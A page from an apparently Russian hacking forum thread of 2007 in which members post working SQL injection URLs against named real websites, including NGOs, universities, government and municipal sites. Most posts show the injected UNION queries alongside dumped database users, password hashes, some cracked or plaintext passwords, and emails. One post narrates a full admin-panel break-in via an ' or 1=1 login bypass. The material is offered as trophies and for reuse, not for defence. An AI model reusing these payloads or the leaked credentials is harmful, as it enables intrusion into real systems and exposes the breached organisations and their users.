ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ_OLD > Уязвимости
Перезагрузить страницу SQL Инъекции
   
 
Страница 248 из 1242 « Первая < 148198238 244 245 246 247 248 249 250 251 252 258298348748 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #2471  
Старый 11.06.2007, 01:58
KPOT_f!nd
Познавший АНТИЧАТ
Регистрация: 25.08.2006
Сообщений: 1,524
Провел на форуме:
3405508

Репутация: 1745


По умолчанию
Код:
http://www.rareconservation.org/news/article.php?id=-14+union+select+1,2,user(),4,concat(version(),0x3a,database()),6,7,8,9,10,11,12,13,14,15,16,17,18+from+news/*
Код:
http://www.americanforests.org/news/display.php?id=-167+union+select+1,2,user,4,password,6,7+from+mysql.user/*
root:*236FB56946627F45C458B3434306F66D085BAF25
liveweb:*9A15CDAE497B891F892D82CC25C89CB34CF519CC
adminweb:*160CC77703CF91DE69921040D35F94E46B897CB3
conference:*7769CBE36C25AA869D42E707102C5DBB948165 11

Код:
http://www.everson.org/news/article.php?id=-22+union+select+1,2,password,username+from+users/*
evers0n:z5Acrour

Код:
http://www.glaad.org/media/resource_kit_detail.php?id=-3495+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+mysql.user/*
Код:
http://www.selfservice.org/article.php?id=-1887+union+select+concat(user(),0x3a,version(),0x3a,database()),2,3,4,5,6,7/*
имееються таблицы:newsletter/members
 

  #2472  
Старый 11.06.2007, 13:38
_Pantera_
Участник форума
Регистрация: 06.10.2006
Сообщений: 226
Провел на форуме:
3025546

Репутация: 1327
Отправить сообщение для _Pantera_ с помощью ICQ
По умолчанию
chat.chat_admin
Код:
http://www.kobifinans.com.tr/ilan_kategori.php?Id=-2+union+select+1,AES_DECRYPT(AES_ENCRYPT(concat(login,char(58),password,char(58),name,char(58),email),0x78),0x78),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+chat.chat_admin/*
onder.isik:3a90d4fe673f875337e06cf2b83051e1 - onder
mahir.hava:307b9b5e9a0ecd6437ddd389eb1c7396 - mahir

mysql.user
Код:
http://www.kobifinans.com.tr/ilan_kategori.php?Id=-2+union+select+1,AES_DECRYPT(AES_ENCRYPT(concat(user,char(58),password),0x78),0x78),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+mysql.user/*
root:57eeeb520498a5cb - 123321

kobifinans_faz3.member
Код:
http://www.kobifinans.com.tr/ilan_kategori.php?Id=-2+union+select+1,AES_DECRYPT(AES_ENCRYPT(concat(nick,char(58),pass),0x78),0x78),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+kobifinans_faz3.member/*
kobifinans_faz3.user
Код:
http://www.kobifinans.com.tr/ilan_kategori.php?Id=-2+union+select+1,AES_DECRYPT(AES_ENCRYPT(concat(user,char(58),pass),0x78),0x78),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+kobifinans_faz3.user/*
fib_2_old.member
Код:
http://www.kobifinans.com.tr/ilan_kategori.php?Id=-2+union+select+1,AES_DECRYPT(AES_ENCRYPT(concat(nick,char(58),pass),0x78),0x78),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+fib_2_old.member/*
fib_2_old.user
Код:
http://www.kobifinans.com.tr/ilan_kategori.php?Id=-2+union+select+1,AES_DECRYPT(AES_ENCRYPT(concat(user,char(58),pass),0x78),0x78),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+fib_2_old.user/*
_____________________

вот еще edu, но таблицы с юзерами не существует(
Код:
http://www.metinberber.ktu.edu.tr/tanitim.php?id=-2+union+select+1,2,3,4,5,6/*
Цитата:
metinberber:duyurular
metinberber:ip2nation
metinberber:menu
metinberber:tanitim
metinberber:visits
metinberber:yonetim
Последний раз редактировалось _Pantera_; 11.06.2007 в 14:10..
 

  #2473  
Старый 11.06.2007, 17:15
netadmin
Новичок
Регистрация: 28.09.2005
Сообщений: 29
Провел на форуме:
64232

Репутация: 0
Отправить сообщение для netadmin с помощью ICQ Отправить сообщение для netadmin с помощью MSN Отправить сообщение для netadmin с помощью Yahoo
По умолчанию
Nu Nashol ia SQL Error na Gruzinskam Saite Top.ge
http://top.ge/stat_ip.php?ID='
no ne kak ne magu vipolnit SQL comandi pamagite pajalusta
 

  #2474  
Старый 11.06.2007, 21:34
alextoun
Постоянный
Регистрация: 07.05.2006
Сообщений: 732
Провел на форуме:
7910701

Репутация: 811


Отправить сообщение для alextoun с помощью ICQ
По умолчанию
Цитата:
http://www.eval-net.org/?id=-1+union+select+1,2,version(),4,5,6,7/*
щаз

Цитата:
http://www.eval-net.org/admin
аштачецом закрыто)
Последний раз редактировалось alextoun; 11.06.2007 в 21:38..
 

sql
  #2475  
Старый 11.06.2007, 22:00
Серенький
Banned
Регистрация: 13.04.2007
Сообщений: 123
Провел на форуме:
921520

Репутация: 572
Arrow sql
Натати Портман

http://www.natalieportman.com/

уязвимость: http://www.natalieportman.com/npcom.php?page_number=149&newsid=1904'

-> смотрим версию, она оказывается четвертой. npcom@natalie.theplanet.host : 4.1.20 : natcom (user(),version(),database())
Пытаемся подобрать названия таблиц, но чего-то ничего не подходит, есть форум phpbb, но префикс подобрать также не удается. Зато есть доступ к таблицам базы mysql:
Цитата:
http://www.natalieportman.com/npcom.php?page_number=149&newsid=-1904'+union+select+1,2,3,4,concat_ws(0x3a,user,pas sword,host),6+from+mysql.user+limit+10,1/*
admin:536b46077018e797:localhost
-> смотрим в таблицу db, и видим, что имеются базы horde, phpmyadmin_6w2sCLlPLlk, sitebuilder3 . причем в базе sitebuilder3 удается подобрать таблицу users , и нужные к ней поля user_name, user_password, email; и находим запись
1:admin:21232f297a57a5a743894a0e4a801fc3
пароль очень сложный, но мы его подбираем - пароль admin ))

идем в админку
Цитата:
http://www.natalieportman.com/admin/
логин/пасс , конечно, не подходят, но зато из-за отсутствия должной фильтрации, мы без труда в неё попадаем, введя в поле логина
' or 1=1/* и произвольное значение в поле пароль.
 

  #2476  
Старый 12.06.2007, 02:10
Constantine
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
Провел на форуме:
7192869

Репутация: 3033


По умолчанию
Демократия по русски. я плакалъ -\
Код:
http://www.democracy.ru/article.php?id=247777+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,concat_ws(0x3a,user(),version(),database()),16/*
5 ветка
Код:
http://termini.lza.lv/article.php?id=9999999+union+select+1,concat(name,char(58),pass),concat_ws(char(58),version(),database(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+users/*
__________________

Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!

з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ
 

  #2477  
Старый 12.06.2007, 04:04
KPOT_f!nd
Познавший АНТИЧАТ
Регистрация: 25.08.2006
Сообщений: 1,524
Провел на форуме:
3405508

Репутация: 1745


По умолчанию
Isis cмотрия антибоян.. Я уже выкладывал..)))
Код:
http://www.peopleandplanet.net/section.php?section=-5+union+select+1,2,concat(user(),0x3a,version(),0x3a,database()),email,5+from+user/*
имееться мылы, может пригодиться кому либо(
 

  #2478  
Старый 12.06.2007, 05:22
KPOT_f!nd
Познавший АНТИЧАТ
Регистрация: 25.08.2006
Сообщений: 1,524
Провел на форуме:
3405508

Репутация: 1745


По умолчанию
А. Лукьянченко Официальный сайт Донецкого городского головы
Код:
http://lukyanchenko.dn.ua/view.php?id=-3187+union+select+1,2,3,4,5,concat(user(),0x3a,version(),0x3a,database()),7,table_name,9,10+from+information_schema.tables/*&cat=1&subcat=0&type=1
Институт математики экономики и механики Одесского национального университета им. И.И.Мечникова
Код:
http://www.imem.odessa.ua/faculties.php?id=-2+union+select+1,passwd,name,4,5,6,email,8,9+from+users/*
webmaster:&WЂчS/`wDvxч)Ѓжў
webmaster@imem.odessa.ua
 

  #2479  
Старый 12.06.2007, 13:41
Ky3bMu4
Постоянный
Регистрация: 03.02.2007
Сообщений: 520
Провел на форуме:
1777536

Репутация: 932


Отправить сообщение для Ky3bMu4 с помощью ICQ
По умолчанию
Код:
http://www.grrn.org/releases/release.php?rid=78&id=6&rhid=-2+union+select+1,2,concat(user(),version())/*
Всё нашёл, подобрал, а ничё вывести не могу:
Код:
http://www.gsb.iastate.edu/projectsissues/news.php?id=-12+union+select+1,2,3,4,5/*
http://www.lib.umich.edu/aael/news.php?newsID=-150+union+select+1/*
Вот к этим не могу подобрать:
Код:
http://www.emiclassics.co.uk/release.php?id=-160149+union+select+1/*
- пробовал до 102 столбца включительно(очень сломать хотелось ).


Код:
http://www.scotlandoffice.gov.uk/our-communications/release.php?id=-3565+union+select+1/*
- до 41 включительно.
Последний раз редактировалось Ky3bMu4; 12.06.2007 в 14:12..
 

  #2480  
Старый 12.06.2007, 14:35
iv.
Moderator - Level 7
Регистрация: 21.03.2007
Сообщений: 1,200
Провел на форуме:
7134052

Репутация: 1204


По умолчанию
Только начал изучать sql-inj, первые две тривиальные инъекции:
Код:
http://opticalnet.ru/articles.phtml?id=-1%20union%20select%201,2,3,4,5/*
version: MySQL 5.0.33
database: opticalnet
user: root@localhost (хехе)
Код:
http://gsl.ru/offshore/list.phtml?cat=-1%20union%20select%201,2,3,4,5/*
version: MySQL 4.0.24-log
user: tgsl@pm25.zenon.net
database: tgsl
 
 
Страница 248 из 1242 « Первая < 148198238 244 245 246 247 248 249 250 251 252 258298348748 > Последняя »



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ